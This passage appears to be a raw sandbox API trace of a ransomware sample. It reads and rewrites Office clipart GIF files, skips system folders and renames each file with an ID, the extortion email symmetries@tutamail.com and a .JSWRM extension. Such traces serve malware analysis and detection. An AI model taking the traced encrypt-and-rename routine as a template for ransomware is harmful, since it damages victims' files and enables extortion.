(lpString1="WB01301_.GIF", lpString2="windows") returned -1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="recovery") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="perflogs") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="documents and settings") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="system volume information") returned 1 [0099.496] lstrcmpiW (lpString1="WB01301_.GIF", lpString2="msocache") returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01301_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01301_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01301_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01301_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01301_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01301_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01301_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01301_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.497] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=681) returned 1 [0099.497] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a0) returned 0x20b1f8 [0099.497] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2a0, lpOverlapped=0x0) returned 1 [0099.536] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.536] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2a0, lpOverlapped=0x0) returned 1 [0099.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.536] CloseHandle (hObject=0x314) returned 1 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0099.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0099.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0099.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0099.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.536] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01301_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01301_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01301_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01301_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0099.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.538] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2076, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01304G.GIF", cAlternateFileName="")) returned 1 [0099.538] lstrcmpiW (lpString1="WB01304G.GIF", lpString2=".") returned 1 [0099.538] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="..") returned 1 [0099.538] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="...") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="windows") returned -1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="recovery") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="perflogs") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="documents and settings") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="system volume information") returned 1 [0099.539] lstrcmpiW (lpString1="WB01304G.GIF", lpString2="msocache") returned 1 [0099.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01304G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01304G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01304G.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01304G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01304G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01304G.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0099.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01304G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01304g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.540] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8310) returned 1 [0099.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2070) returned 0x205850 [0099.540] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2070, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2070, lpOverlapped=0x0) returned 1 [0099.542] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.542] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2070, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2070, lpOverlapped=0x0) returned 1 [0099.542] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.542] CloseHandle (hObject=0x314) returned 1 [0099.542] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0099.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0099.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0099.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0099.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0099.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0099.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01304G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01304g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01304G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01304g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.544] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x172, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01330_.GIF", cAlternateFileName="")) returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2=".") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="..") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="...") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="windows") returned -1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="recovery") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="perflogs") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="documents and settings") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="system volume information") returned 1 [0099.544] lstrcmpiW (lpString1="WB01330_.GIF", lpString2="msocache") returned 1 [0099.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01330_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01330_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01330_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0099.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01330_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01330_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01330_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0099.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0099.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01330_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01330_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.545] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=370) returned 1 [0099.545] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x170) returned 0x1ff448 [0099.545] ReadFile (in: hFile=0x314, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345e89c*=0x170, lpOverlapped=0x0) returned 1 [0099.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.546] WriteFile (in: hFile=0x314, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345e898*=0x170, lpOverlapped=0x0) returned 1 [0099.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0099.546] CloseHandle (hObject=0x314) returned 1 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0099.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0099.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0099.546] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0099.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0099.546] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01330_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01330_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01330_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01330_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0099.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0099.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0099.547] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01734_.GIF", cAlternateFileName="")) returned 1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2=".") returned 1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="..") returned 1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="...") returned 1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="windows") returned -1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="recovery") returned 1 [0099.547] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="perflogs") returned 1 [0099.548] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="documents and settings") returned 1 [0099.548] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.548] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="system volume information") returned 1 [0099.548] lstrcmpiW (lpString1="WB01734_.GIF", lpString2="msocache") returned 1 [0099.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01734_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01734_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01734_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0099.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01734_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01734_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01734_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0099.548] RtlAllocateHeap 